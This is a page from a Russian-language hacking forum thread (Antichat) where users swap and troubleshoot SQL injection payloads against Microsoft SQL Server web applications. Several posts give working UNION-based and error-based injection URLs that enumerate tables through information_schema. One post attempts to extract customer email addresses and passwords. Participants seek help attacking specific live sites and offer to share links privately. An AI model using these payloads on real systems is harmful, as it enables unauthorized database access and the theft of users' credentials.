ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Провидение Иньекций в MSSQL сервер от Microsoft.
   
Ответ
Страница 10 из 11 « Первая < 6 7 8 9 10 11 >
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 27.07.2009, 02:13
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Спасибо.

Чот не работает так.

делаю по такой схеме.

PHP код:
SELECT top 20 FROM [some_table]

 WHERE [primary_key_fieldNOT IN

 (

 SELECT top 10 [primary_key_field]

FROM [some_table]

ORDER BY [primary_key_field]

 )

 ORDER BY [primary_key_field

site/script?id=-7+union+select+top+1+1,2,3,table_name+4,5+from+inf ormation_schema.columns+where+table_name+NOT+IN+(S ELECT+TOP+5+table_name+FROM+information_schema.col umns+ORDER+BY+table_name)+ORDER+BY+table_name--



PS. Аа.. primary_key - это же id записи вроде как? Но в information_schema.columns нет primary_key ведь. Как быть?
 
Ответить с цитированием

  #92  
Старый 27.07.2009, 05:03
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию
классический метод.
1 запрос:
Цитата:
index.asp?id=-7+union+select+top+1+1,2,3,table_name+4,5+from+inf ormation_schema.columns
2 запрос:
Цитата:
index.asp?id=-7+union+select+top+1+1,2,3,table_name+4,5+from+inf ormation_schema.columns+where+table_name+not+in+(' таблица из первого запроса'... и т.д.)
На первой странице ж написано.
Последний раз редактировалось shellz[21h]; 27.07.2009 в 05:06..
 
Ответить с цитированием

  #93  
Старый 27.07.2009, 05:54
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию
?pid=443 or 1=(select top 1 table_name from information_schema.tables where table_name not in (SELECT TOP N table_name FROM information_schema.tables order by table_name))--
где N - номер с 0 до .....
Проверено работает.
 
Ответить с цитированием

hi!
  #94  
Старый 17.01.2010, 06:19
Sophos
Новичок
Регистрация: 06.09.2008
Сообщений: 6
Провел на форуме:
91159

Репутация: 5
По умолчанию hi!
Thanks for your tutorials and help here.
I have a question, I searched a lot but I didn't find any explanations.

So here's the problem:

Код:
www.somesite.com/.../asp?id=1
after I put " ' "

Код:
www.somesite.com/.../asp?id=1 '
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to numeric.
I have tried many ways, but whatever I do the same error appears .

My question is how to inject this one. Simply, nothing worked, I've even chared the whole query.

If anyone could help, I'll appreciate that a lot! I can send link, but only on PM.

Spasiba
 
Ответить с цитированием

  #95  
Старый 30.01.2010, 23:47
somemember
Новичок
Регистрация: 30.01.2010
Сообщений: 2
Провел на форуме:
10637

Репутация: 0
По умолчанию
Кто знает, как узнать корневой каталог веб-сайта с помощью Transact SQL ?
 
Ответить с цитированием

  #96  
Старый 31.01.2010, 05:33
BeerDrinker
Новичок
Регистрация: 15.03.2008
Сообщений: 7
Провел на форуме:
118564

Репутация: 6
По умолчанию
Подскажите пожалуйста как закоментировать конец строки.
-- не помогает: "Characters found after end of SQL statement."
 
Ответить с цитированием

  #97  
Старый 27.03.2010, 09:30
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
а ето что за еррор ??

vis.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]FIPS Warning: Line 1 has the non-ANSI clause 'TOP'.

/lex/basesog/vis.asp, line 9
 
Ответить с цитированием

  #98  
Старый 28.03.2010, 17:47
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию
Кто знает,что за ошибка такая ? Диз похож на mssql:

Provider error '80020005'

Type mismatch.

реакция на 1+or+1=1
 
Ответить с цитированием

  #99  
Старый 28.03.2010, 19:41
McFlow
Новичок
Регистрация: 23.01.2009
Сообщений: 22
Провел на форуме:
96435

Репутация: 96
Отправить сообщение для McFlow с помощью ICQ
По умолчанию
Либо аутентификация, либо трансформирование данных . . .ну это имхо
 
Ответить с цитированием

  #100  
Старый 06.04.2010, 18:40
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Какие ище есть методы с Выводом Данных?

1+or+1=(SELECT+TOP+1+cast(EmailAd dress+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+ nvarchar)+from+Customers)--

так уменя не идет
 
Ответить с цитированием
Ответ
Страница 10 из 11 « Первая < 6 7 8 9 10 11 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Мнения: "Безопасность от Microsoft: шаг к обновленному миру?" dinar_007 Мировые новости 5 25.12.2006 19:20
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости 17 12.12.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ